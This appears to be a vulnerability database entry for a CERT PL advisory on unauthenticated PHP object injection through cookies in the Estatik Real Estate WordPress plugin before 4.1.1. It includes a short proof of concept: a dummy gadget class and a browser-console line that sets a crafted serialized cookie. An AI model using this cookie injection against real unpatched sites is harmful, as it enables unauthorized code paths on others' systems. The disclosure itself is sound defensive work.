Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:8CFD8C1F-2834-4A94-A3FA-C0CFBE78A8B7HistoryDec 25, 2023 - 12:00 a.m.
Estatik Real Estate Plugin < 4.1.1 - Unauthenticated PHP Object Injection
2023-12-2500:00:00
Krzysztof Zając (CERT PL)
wpscan.com
7
estatik real estate
unauthenticated user
php object injection
gadget chain
developer console
Description The plugin unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog
PoC
To simulate a gadget chain, put the following code in a plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated and reload the page to see the Arbitrary deserialization message. document.cookie=‘es_wishlist=O:4:“Evil”:0:{}’
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 4.1.1 |
Related
cvelist
cvelist
cve
cve
CVE-2023-6049
2024-01-15 16:15:12
prion
prion
Design/Logic Flaw
2024-01-15 16:15:00
nvd
nvd
CVE-2023-6049
2024-01-15 16:15:12
wpexploit
wpexploit
Estatik Real Estate Plugin < 4.1.1 - Unauthenticated PHP Object Injection
2023-12-25 00:00:00
7.2 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
69.7%
Related for WPVDB-ID:8CFD8C1F-2834-4A94-A3FA-C0CFBE78A8B7